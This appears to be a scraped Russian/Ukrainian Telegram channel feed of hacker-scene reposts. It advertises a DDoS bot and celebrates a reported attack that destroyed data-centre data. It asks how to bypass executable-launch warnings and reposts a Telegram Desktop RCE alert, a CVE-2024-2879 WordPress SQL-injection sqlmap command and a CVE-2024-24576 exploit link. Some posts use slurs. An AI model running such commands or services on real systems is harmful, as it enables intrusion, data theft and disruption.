Family RIN
Кстати ибейший бот ддос @shootershootit_bot
Хд, https://check-host.net/check-report/179da4dek7f6 лаунчер игр Hassle Online and Radmir rp
Forwarded from DC8044 F33d
Ассоциированные с СБУ хекеры из группы BLACKJACK совершили кибератаку на дата-центр, которым пользовались военные предприятия рахи. Атаке подвергся облачный сервис OwenCloud, в котором хранились данные предприятия лаптеногого ВПК, а также нефтегазового, металлургического, авиакосмического комплексов.
В результате атаки, как утверждается, было уничтожено более 300 терабайт данных. «Речь идет о 400 виртуальных и 42 физических серверах, на которых размещалась внутренняя документация, резервные копии и другие программы, через которые клиенты удаленно управляли производственными процессами на предприятиях».
Нормально пробили жмыхам.
В результате атаки, как утверждается, было уничтожено более 300 терабайт данных. «Речь идет о 400 виртуальных и 42 физических серверах, на которых размещалась внутренняя документация, резервные копии и другие программы, через которые клиенты удаленно управляли производственными процессами на предприятиях».
Нормально пробили жмыхам.
👍2
DC8044 F33d
Ассоциированные с СБУ хекеры из группы BLACKJACK совершили кибератаку на дата-центр, которым пользовались военные предприятия рахи. Атаке подвергся облачный сервис OwenCloud, в котором хранились данные предприятия лаптеногого ВПК, а также нефтегазового, …
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from DC1488
УВАГА! Особливо військові!
У клієнтах Telegram Desktop виявлено вразливість для виконання довільного коду (так звана RCE вразливість) при обробці медіафайлів. Ця проблема наражає користувачів на ризик зловмисних атак через спеціально створені медіафайли, такі як зображення або відео.
З метою безпеки вимкніть функцію автоматичного завантаження медіа (фото, відео, файлів). Будь ласка, дотримуйтесь цих кроків:
Перейдіть в налаштування (Settings).
Натисніть "Розширені" (Advanced).
У розділі "Автоматичне завантаження медіа" (Automatic media download) негайно вимкніть автоматичне завантаження для "Фотографій", "Відео" та "Файлів" у всіх типах чатів (особисті чати, групи та канали). Всі повзунки мають бути в положенні вимкнено. Перезавантажте застосунок Телеграм Десктоп.
З цього моменту і до виходу відповідних оновлень Телеграму, яке виправляє вразливість, не переглядайте зайвого медіа-контенту (не завантажуйте його), особливо від незнайомих контактів.
Це не чутки: ми знаємось на кібербезпеці і знаємо, про що пишемо! Ще раз: мова лише про десктоп. Мобільних клієнтів Телеграм це не стосується.
У клієнтах Telegram Desktop виявлено вразливість для виконання довільного коду (так звана RCE вразливість) при обробці медіафайлів. Ця проблема наражає користувачів на ризик зловмисних атак через спеціально створені медіафайли, такі як зображення або відео.
З метою безпеки вимкніть функцію автоматичного завантаження медіа (фото, відео, файлів). Будь ласка, дотримуйтесь цих кроків:
Перейдіть в налаштування (Settings).
Натисніть "Розширені" (Advanced).
У розділі "Автоматичне завантаження медіа" (Automatic media download) негайно вимкніть автоматичне завантаження для "Фотографій", "Відео" та "Файлів" у всіх типах чатів (особисті чати, групи та канали). Всі повзунки мають бути в положенні вимкнено. Перезавантажте застосунок Телеграм Десктоп.
З цього моменту і до виходу відповідних оновлень Телеграму, яке виправляє вразливість, не переглядайте зайвого медіа-контенту (не завантажуйте його), особливо від незнайомих контактів.
Це не чутки: ми знаємось на кібербезпеці і знаємо, про що пишемо! Ще раз: мова лише про десктоп. Мобільних клієнтів Телеграм це не стосується.
👍4
Family RIN
Верим в рце?
Кстати она есть, добрые люди скинули посмотреть
Family RIN
Video
Может кто знает как обойти предупреждение о запуске выполняемого файла
Forwarded from TON POINTER (KRAIT⚡)
Forwarded from Proxy Bar
CVE-2024-2879 LayerSlider плагин для WordPress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
#wordpress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T#wordpress
Догадки мои или нет, но опенаи начинает или постепенно запускает интернет к чатгпт
Forwarded from Clown security
Малюткам на растерах, аля самом безопасном языке погроммирования, стоит напрячь свои пердачки и запастись вазелином. Ведь используя данную уязвимость можно захватить контроль над пк и выкачать все биткоины или тончики.
PoC
https://github.com/aydinnyunus/CVE-2024-24576-Exploit
PoC
https://github.com/aydinnyunus/CVE-2024-24576-Exploit
GitHub
GitHub - aydinnyunus/CVE-2024-24576-Exploit: CVE-2024-24576 Proof of Concept
CVE-2024-24576 Proof of Concept. Contribute to aydinnyunus/CVE-2024-24576-Exploit development by creating an account on GitHub.